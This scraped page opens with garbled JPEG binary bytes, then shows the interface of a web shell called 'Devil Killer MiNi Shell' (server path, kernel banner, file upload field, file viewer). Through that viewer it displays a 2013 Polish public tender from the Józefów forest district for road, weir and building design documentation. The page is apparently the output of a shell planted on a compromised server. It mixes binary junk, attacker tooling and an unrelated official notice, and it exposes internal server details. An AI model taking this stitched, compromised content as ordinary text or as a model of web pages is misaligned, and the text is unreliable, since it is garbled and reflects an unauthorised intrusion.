JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130403/128910-N-2013.html

<p class="kh_header"><b>Józefów: Opracowanie dokumentacji projektowo - kosztorysowej na budowę i przebudowę dróg leśnych oraz przebudowę zastawki i adaptację budynków Nadleśnictwa Józefów</b><br>
<b>Numer ogłoszenia: 128910 - 2013; data zamieszczenia: 03.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe - Nadleśnictwo Józefów , ul. Leśna 46, 23-460 Józefów, woj. lubelskie, tel. 084 6878005, faks 084 6878280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lublin.lasy.gov.pl/web/jozefow</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_jozefow/zamówienia _publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej na budowę i przebudowę dróg leśnych oraz przebudowę zastawki i adaptację budynków Nadleśnictwa Józefów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo  - kosztorysowej na budowę i przebudowę dróg leśnych oraz przebudowę zastawki i adaptację budynków Nadleśnictwa Józefów, które ze względów organizacyjnych podzielono na 3 części:
1)  część nr 1 - opracowanie dokumentacji projektowo - kosztorysowej na:
- budowę drogi leśnej W Oterebek,
- przebudowę drogi leśnej Sałatyn.
2) część nr 2 - opracowanie dokumentacji projektowo - kosztorysowej na przebudowę zastawki - ujęcia wody na rzece Łosiniecki Potok na potrzeby szkółki leśnej Rebizanty.
3) część nr 3 - opracowanie uproszczonej dokumentacji projektowo - kosztorysowej: 
a) Adaptacji budynku biura n-ctwa nr inw 105/5 - pomieszczania na magazyn broni,
b) Rozbudowy instalacji alarmowej nr inw. 624/468 w bud. biura n-ctwa - magazyn broni,
c) Adaptacji budynku nr inw . 108/65 na magazyn OHZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje do opisu tego warunku udziału w postępowaniu żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie przez Wykonawcę, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: dla jednej części zamówienia, wykonał, co najmniej jedną usługę odpowiadającą swoim rodzajem (projekt budowy lub przebudowy drogi) i odpowiadającą wartością przedmiotowi zamówienia: (o kwocie nie mniejszej niż  35 000,00zł.), odpowiednio potwierdzoną, że została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje do opisu tego warunku udziału w postępowaniu żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest dysponować co najmniej jedną osobą, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie obejmujące co najmniej projektowanie, sprawdzanie projektów architektoniczno-budowlanych, sprawowanie nadzoru autorskiego zgodnie  z ustawą z 7 lipca 1994r., Prawo budowlane (tj. Dz. U. 2010r., nr 243, poz. 1623 ze zm.):,
- dla części nr 1 zamówienia - w specjalności drogowej,
- dla części nr 2 zamówienia - w specjalności konstrukcyjno-budowlanej 
- dla części nr 3 zamówienia - w specjalności w specjalności konstrukcyjno-budowlanej w zakresie śródlądowych budowli hydrotechnicznych lub obiektów budowlanych  melioracji wodnych.
Zamawiający w zakresie w/w uprawnień dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz. U. z 2010r., nr 243 poz.1623 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje do opisu tego warunku udziału w postępowaniu żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz ten powinien obejmować wszystkie wykonane usługi od wartości powyżej 20,0 tys. zł brutto oraz dodatkowo usługi niewykonane i wykonane nienależycie - niezależnie od ich wartości;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo wprowadzania zmian korzystnych dla Zamawiającego, których na dzień ogłoszenia przetargu nie przewidział, a dotyczących każdego jej postanowienia, tj. takich zmian, które nie wpłynęłyby na krąg podmiotów ubiegających się o zamówienie publiczne bądź na wynik samego postępowania o to zamówienie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_jozefow/zamówienia _publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Józefów, ul.
Leśna 46, 23-460 Józefów, w pokoju nr 9 (I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2013 godzina 09:00, miejsce: Nadleśnictwo Józefów ul. Leśna 46, 23-460 Józefów, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przed podpisaniem umowy Wykonawca przedłoży Zamawiającemu wynikające z  ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2010r., Nr 243, poz. 1623, ze zm.) dokumenty potwierdzające, że osoba uczestnicząca w realizacji zamówienia posiada odpowiednie uprawnienia budowlane obejmujące co najmniej projektowanie, sprawdzanie projektów architektoniczno-budowlanych, sprawowanie nadzoru autorskiego: 
a) dla części nr 1 zamówienia - w specjalności drogowej,
b) dla części nr 2 zamówienia - w specjalności konstrukcyjno-budowlanej 
c) dla części nr 3 zamówienia - w specjalności w specjalności konstrukcyjno-budowlanej w zakresie śródlądowych budowli hydrotechnicznych lub obiektów budowlanych  melioracji wodnych, tj.:
- kopię uprawnień budowlanych,
- kopię aktualnego wpisu na listę członków właściwej izby samorządu zawodowego lub zaświadczenia potwierdzającego posiadanie kwalifikacji do wykonywania zawodu inżyniera budownictwa na terytorium Rzeczpospolitej Polskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej :
a) na budowę drogi leśnej W Oterebek.
b) na przebudowę drogi leśnej Sałatyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej :
a) na budowę drogi leśnej W Oterebek. 
Opis: Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej budowy drogi leśnej W Oterebek od punktu A do punktu  B, - załącznik graficzny nr 3a, o długości ok. 2,15km, o nawierzchni twardej ulepszonej o nośności co najmniej 10ton, wykonanej z płyt prefabrykowanych wielootworowych i materiału kamiennego, z jezdnią o jednym pasie ruchu szerokości 3,0m, mijankami o wymiarze: długości odcinka prostego 23m i długości skosów 2 x 17,5m, oraz zjazdami na drogi leśne wewnątrzzakładowe, odwodnienie powierzchniowe za pomocą rowów i przepustów rurowych, odpowiadającej wytycznym Dyrekcji Generalnej Lasów Państwowych zawartych w opracowaniu Drogi leśne - poradnik techniczny Warszawa - Bedoń 2006, 
W zakres prac objętych zamówieniem wchodzi: 
1. Wykonanie dokumentacji projektowej - 5 egz., 
1.1. zgodnie z: 
a) Ustawą z dnia 07 lipca 1994r., - Prawo budowlane (tj. Dz. U. z 2010r., Nr 243, poz. 1623, ze zm.), 
b) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r., w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r., poz. 462), 
c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r., w sprawie szczegółowego zakresu i formy zakresu dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. z 2004r., Nr 202, poz. 2072 ze zm.), 
d) Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r., w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r., nr 120, poz. 1126), 
e) Rozporządzeniem Ministra Środowiska  z dnia 22 marca 2006r., w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów                          (Dz. U. z 2006r., Nr 58, poz. 405 ze zm.). 
1.2. zawierającej między innymi: 
a) mapę sytuacyjno - wysokościową do celów projektowych; 
b) projekt architektoniczno-budowlany w zakresie uwzględniającym specyfikę robót budowlanych wraz z wyznaczeniem przebiegu trasy w terenie (kołki, farba); 
c) projekt wykonawczy; 
d) projekt zagospodarowania terenu wraz częścią architektoniczno - budowlaną; 
e) dokumentację geologiczno - inżynierską. Należy wykonać minimum 10 odwiertów i sporządzić z tego tytułu protokół (wraz z mapką z zaznaczoną lokalizacją odwiertów), a następnie wyniki badań należy dołączyć do projektu. 
 f) przedmiar robót; 
g) informację dotyczącą bezpieczeństwa i ochrony zdrowia; 
i) inne niezbędne opinie, uzgodnienia - w tym z wymogami ochrony przeciwpożarowej i sprawdzenie projektów (nie dotyczy uzyskania: 
- decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
- decyzji o pozwoleniu na budowę). 
2. Opracowanie specyfikacji technicznej wykonania i odbioru robót - 2 egz. 
3. Opracowanie operatu wodno-prawnego - 2 egz.
4. Opracowanie kosztorysu inwestorskiego i ofertowego - 2 egz.
5. Wszystkie elementy dokumentacji, rozwiązania techniczne należy opracować również w formie elektronicznej, w postaci plików ogólnodostępnych (format PDF) - zapisane na nośniku trwałym (CD lub DVD) - 1 egz.

b) na przebudowę drogi leśnej Sałatyn. 
Opis: Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej przebudowy drogi leśnej Sałatyn od punktu C do punktu  D, - załącznik graficzny nr 3a, o długości ok. 4,2km, o nawierzchni twardej ulepszonej o nośności co najmniej 10ton, wykonanej z płyt prefabrykowanych wielootworowych i materiału kamiennego, z jezdnią o jednym pasie ruchu szerokości 3,0m, mijankami  o wymiarze: długości odcinka prostego 23m i długości skosów 2 x 17,5m, oraz zjazdami na drogi leśne wewnątrzzakładowe, odwodnienie powierzchniowej za pomocą rowów i przepustów rurowych, odpowiadające wytycznym Dyrekcji Generalnej Lasów Państwowych zawartych w opracowaniu Drogi leśne - poradnik techniczny Warszawa - Bedoń 2006, - załącznik nr 13. 
W zakres prac objętych zamówieniem wchodzi: 
1. Wykonanie dokumentacji projektowej - 5 egz., 
1.1. zgodnie z: 
a) Ustawą z dnia 07 lipca 1994r., - Prawo budowlane (tj. Dz. U. z 2010r., Nr 243, poz. 1623, ze zm.), 
b) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r., w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r., poz. 462), 
c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r., w sprawie szczegółowego zakresu i formy zakresu dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. z 2004r., Nr 202, poz. 2072 ze zm.), 
d) Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r., w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r., nr 120, poz. 1126), 
e) Rozporządzeniem Ministra Środowiska  z dnia 22 marca 2006r., w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów                          (Dz. U. z 2006r., Nr 58, poz. 405 ze zm.). 
1.2. zawierającej między innymi: 
a) mapę sytuacyjno - wysokościową do celów projektowych; 
b) projekt architektoniczno-budowlany w zakresie uwzględniającym specyfikę robót budowlanych wraz z wyznaczeniem przebiegu trasy w terenie (kołki, farba); 
c) projekt wykonawczy; 
d) projekt zagospodarowania terenu wraz częścią architektoniczno - budowlaną; 
e) dokumentację geologiczno - inżynierską. Należy wykonać minimum 10 odwiertów i sporządzić z tego tytułu protokół (wraz z mapką z zaznaczoną lokalizacją odwiertów), a następnie wyniki badań należy dołączyć do projektu. 
 f) przedmiar robót; 
g) informację dotyczącą bezpieczeństwa i ochrony zdrowia; 
i) inne niezbędne opinie, uzgodnienia - w tym z wymogami ochrony przeciwpożarowej i sprawdzenie projektów (nie dotyczy uzyskania: 
- decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
- decyzji o pozwoleniu na budowę). 
2. Opracowanie specyfikacji technicznej wykonania i odbioru robót - 2 egz. 
3. Opracowanie operatu wodno-prawnego - 2 egz.
4. Opracowanie kosztorysu inwestorskiego i ofertowego - 2 egz.
5. Wszystkie elementy dokumentacji, rozwiązania techniczne należy opracować również w formie elektronicznej, w postaci plików ogólnodostępnych (format PDF) - zapisane na nośniku trwałym (CD lub DVD) - 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej przebudowy zastawki - ujęcia wody na rzece  Łosiniecki Potok na potrzeby szkółki leśnej Rebizanty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej przebudowy istniejącej zastawki - ujęcia wody na rzece  Łosiniecki Potok na potrzeby szkółki leśnej Rebizanty, w tym: wykonanie konstrukcji drewnianej zastawki o wysokości piętrzenia do 1m, ścianki szczelnej i szandorów  z zabezpieczeniem skarp i brzegów rzeki w miejscu posadowienia obiektu, odmulenie koryta rzeki oraz ujęcia wody, oznakowanie obiektu i inne roboty ogólnobudowlane.  
W zakres prac objętych zamówieniem wchodzi: 
1. Wykonanie dokumentacji projektowej - 5 egz., 
1.1. zgodnie z: 
a) Ustawą z dnia 07 lipca 1994r., - Prawo budowlane (tj. Dz. U. z 2010r., Nr 243, poz. 1623, ze zm.), 
b) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r., w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r., poz. 462), 
c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r., w sprawie szczegółowego zakresu i formy zakresu dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. z 2004r., Nr 202, poz. 2072 ze zm.), 
d) Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r., w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r., nr 120, poz. 1126), 
1.2. zawierającej między innymi: 
a) mapę sytuacyjno - wysokościową do celów projektowych; 
b) projekt architektoniczno-budowlany w zakresie uwzględniającym specyfikę robót budowlanych wraz z wyznaczeniem obiektu trasy w terenie (kołki, farba); 
c) projekt wykonawczy; 
d) projekt zagospodarowania terenu wraz częścią architektoniczno - budowlaną; 
e) dokumentację geologiczno - inżynierską. 
 f) przedmiar robót; 
